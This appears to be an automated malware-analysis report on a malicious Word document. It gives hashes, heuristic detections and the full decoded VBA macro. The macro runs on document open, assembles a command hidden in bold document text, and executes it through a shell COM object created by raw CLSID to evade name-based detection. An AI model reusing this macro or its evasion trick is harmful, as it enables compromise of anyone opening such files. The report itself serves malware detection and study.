Office (OOXML) malware analysis — malicious · 66af536f09d0d2b2

MALICIOUS

Office (OOXML)

33.6 KB Created: 2021-03-02 08:06:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2022-06-20

MD5: 1a1f638032ca63a01c77966a69753134 SHA-1: 2beb3e2e1909eef5666dfc3af7517d8d4ec4148c SHA-256: 66af536f09d0d2b26dcb498b5343c231e6df08cc6a2395bab3e9bef09617da29

130 Risk Score

Heuristics 5

VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUS

VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
Matched line in script
```
Set vb09 = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
```
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
Set vb09 = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	2959 bytes
SHA-256: `01e9f19dbe75b9eeb1b096cbd7f00848766f05ebb07bac69c1e42125029a7b12`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Dim pfiays As String Private Sub Document_Open() Call nmngtyy End Sub Private Sub nmngtyy() Call zoRGbKq.MJZeDZthT End Sub Attribute VB_Name = "zoRGbKq" Sub zkGNkuoJBwNLwqzYmFHm(fAsOrBYGXcskHVrWSVwQtX, sjRRlDEcDApDazDM, upCRIcEhrPubHndHjAfakmDTzokSSRWPIGWD) RTslPZsfSARalkQYMAsPJyrWHVbXrW = 3.02622430229299E+36 ORmi = "NbUUveiwvkLGjzZE" XZScVetyVnvzCJzC = 65008274 KlfX = "fPuaWKVnsxwytNPnsw" End Sub Public Sub MJZeDZthT() On Error Resume Next Dim myShape As InlineShape Dim myRange As Range For Each myRange In ActiveDocument.StoryRanges For Each myShape In myRange.InlineShapes myShape.Delete Next myShape Next myRange Dim zxd As Variant Dim zxtgsaqeyhzfgds3re As String Dim oRng As Range Dim oNewRng As Range Set oRng = Selection.Range '(the formatted range you are wanting to write) oRng.MoveEndWhile Chr(32), wdBackward 'Remove trailing spaces from the range Set oNewRng = ActiveDocument.Range 'Locate the range where it is to be written oNewRng.Collapse wdCollapseEnd 'oNewRng.FormattedText = oRng 'then write it. Dim Para As Paragraph Dim i As Long Application.ScreenUpdating = False With ActiveDocument For i = .Paragraphs.Count To 1 Step -1 Set Para = .Paragraphs(i) With Para If .Range.End - .Range.Start = 1 Then .Range.Delete Else If 9.4 + Sin(66) = 45.66 Then Else .SpaceBefore = 6 .SpaceAfter = 6 End If End If End With Next i End With Application.ScreenUpdating = True Dim singleLine As Paragraph Dim rng As Range Dim pos As Integer Dim Wrd As Range For Each singleLine In ActiveDocument.Paragraphs Set rng = singleLine.Range If rng.Font.Bold Then 'MsgBox "This is bold" lineText = singleLine.Range.Text zzOTXPoDh = zzOTXPoDh + lineText ' MsgBox (zzOTXPoDh) End If Next WpkbB = "xOKhf" fE = "JCT" TDOvQ = "F" fgmV7c9 = TQizCJo HKODnr = "ok" YmBx = "436" s4n2 = "KyeOwJhq" b7n87s = "7QnemiX" BL3u7 = "c5KuqKtg4gr" ZFF = Null VCFGv = ZFF zzOTXPoDh = Replace(zzOTXPoDh, "yueaavtwlqn", "") Set vb09 = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") vb09.Run Gravity & "" & zzOTXPoDh, 0.0001 End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	15360 bytes
SHA-256: `a428d7913b8529b464d1e41a62587db5f45f6ffd2763205355e211e38c49561c`

Open this report in the interactive analyzer, or submit your own file for analysis.